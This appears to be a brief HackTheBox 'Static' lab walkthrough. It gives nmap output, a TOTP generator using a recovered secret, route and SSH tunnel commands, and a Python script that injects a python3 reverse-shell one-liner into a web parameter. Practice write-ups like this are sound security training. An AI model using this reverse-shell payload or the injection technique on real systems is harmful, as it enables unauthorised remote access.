HackTheBox-Static

NMAP

PORT     STATE SERVICE REASON         VERSION                             
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 16:bb:a0:a1:20:b7:82:4d:d2:9f:35:52:f4:2e:6c:90 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDCyM3ZYCZb4Brnei3KsMgp18Z1bj/LergclItE15gBjvpKqrol6BwKJoXexCMpUT+THzjpvRtKZKandJhGAqqUg+6nWzucemV1mk8X2LNvCI
GdjErJSR5xBoGnXBA7zukgcZpsM4w/WU2X3SoGlyf6oSMJUa8C/wfOIYk+HRudgrC7Z91zXTOyznUTZf/J00xXCgHXNcIWNthocAkCcE8MdYbmLU1qe0UZu/nwBgFApA6KeQAx5h4Ud91lDNq0EO
F0wkbXZUuDMCMyiL8UCp4UYwLCBGYCfgYQXHqJq/GcPefRbUs/XEE2CXSebhVsyHhtvRRBUiNZszks9enCUFGB
| 256 ca:ad:63:8f:30:ee:66:b1:37:9d:c5:eb:4d:44:d9:2b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNf6FprVNh/Yi39D1fB5G7C/WiaREa9qZMAwv2jRhAz71cYsIwuBxUitj+0TjPTSG/r7+bdEEs
AQmkgTxkPfrjU=
| 256 2d:43:bc:4e:b3:33:c9:82:4e:de:b6:5e:10:ca:a7:c5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINnml/gfiZRSzXbYCQkMsc1H84hQjJTvcB3soJtwaJNM
2222/tcp open ssh syn-ack ttl 62 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:a4:5c:e3:a9:05:54:b1:1c:ae:1b:b7:61:ac:76:d6 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFhedw/OTRm1/n5R5PpuH9+jPs5j81N7nsTUaje8g0HxCOuIDij/+O+xmAYRpDV60ADB8/Ioe0wULEWnheVojyNRsYe0XuAmhRlUDducqHI3
Xyo+KuSI/tYj5CSR4g8zNnWp9YRmlxXOOu2TXHx483eXdeL750hFTkYulGyK9HrU0N8N8YWQH4texZ7gxGAYUGGBoakcVfSDBzvld9qgEs137ZSdtI4D7Em183Y12dmUZo74uNEHgJmeDKYUnWCh
wNeaW7Zl5yTyPEi9J3sIqsqjuHGo7apLwpyd0I1EWmhSnCyrNq5U8BPV677DBWw5EF2XiP+JRHOBcoNq5eO9nf
| 256 c9:58:53:93:b3:90:9e:a0:08:aa:48:be:5e:c4:0a:94 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNVf3s2ZPSKXQraO42ZjobZnZzMTskFcq4+3sPsNNCzUg0bBlRd5OLa0BKg5x6p3Xn8L+t66j1
aL07A9ARtfqPw=
| 256 c7:07:2b:07:43:4f:ab:c8:da:57:7f:ea:b5:50:21:bd (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIODBH7Wgp6xHhtscsZzHnrgNBefLriYH601FqYRUOVNU
8080/tcp open http syn-ack ttl 63 Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 2 disallowed entries
|_/vpn/ /.ftp_uploads/

PORT 8080 (HTTP)

pip install pyotp
import pyotptotp = pyotp.TOTP('orxxi4c7orxwwzlo')
print (totp.now())
ip route add 172.20.0.10 via 172.30.0.9 dev tun9
ip route add 172.20.0.11 via 172.30.0.9 dev tun9

WEB

PORT   STATE SERVICE REASON         VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:a4:5c:e3:a9:05:54:b1:1c:ae:1b:b7:61:ac:76:d6 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFhedw/OTRm1/n5R5PpuH9+jPs5j81N7nsTUaje8g0HxCOuIDij/+O+xmAYRpDV60ADB8/Ioe0wULEWnheVojyNRsYe0XuAmhRlUDducqHI3
Xyo+KuSI/tYj5CSR4g8zNnWp9YRmlxXOOu2TXHx483eXdeL750hFTkYulGyK9HrU0N8N8YWQH4texZ7gxGAYUGGBoakcVfSDBzvld9qgEs137ZSdtI4D7Em183Y12dmUZo74uNEHgJmeDKYUnWCh
wNeaW7Zl5yTyPEi9J3sIqsqjuHGo7apLwpyd0I1EWmhSnCyrNq5U8BPV677DBWw5EF2XiP+JRHOBcoNq5eO9nf
| 256 c9:58:53:93:b3:90:9e:a0:08:aa:48:be:5e:c4:0a:94 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNVf3s2ZPSKXQraO42ZjobZnZzMTskFcq4+3sPsNNCzUg0bBlRd5OLa0BKg5x6p3Xn8L+t66j1
aL07A9ARtfqPw=
| 256 c7:07:2b:07:43:4f:ab:c8:da:57:7f:ea:b5:50:21:bd (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIODBH7Wgp6xHhtscsZzHnrgNBefLriYH601FqYRUOVNU
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29
| http-ls: Volume /
| SIZE TIME FILENAME
| 19 2020-04-03 15:18 info.php
| - 2020-03-26 09:40 vpn/
|_
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Index of /
Service Info: Host: 172.20.0.10; OS: Linux; CPE: cpe:/o:linux:linux_kernel

DB

PORT     STATE SERVICE REASON         VERSION
3306/tcp open mysql? syn-ack ttl 63
| fingerprint-strings:
| GenericLines:
| 5.5.5-10.4.12-MariaDB-1:10.4.12+maria~bionic
| l6h)2^bS
| YD)=8C&4oU=o
| mysql_native_password
| #HY000Proxy header is not accepted from 172.30.0.9
| LDAPBindReq:
| 5.5.5-10.4.12-MariaDB-1:10.4.12+maria~bionic
| @86F?F$}
| l)"m$g]xh}^<
| mysql_native_password
| afp:
| 5.5.5-10.4.12-MariaDB-1:10.4.12+maria~bionic
| re"uMix
| Ay_NJfC])UNg
|_ mysql_native_password

Foothold

ssh -L 8888:192.168.254.3:80 www-data@172.20.0.10 -i id_rsa
import requests

payload = '/usr/bin/python3 -c \'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.254.2",2222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\''
r = requests.get("http://192.168.254.3/index.php?a="+payload)
print(r.text)

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store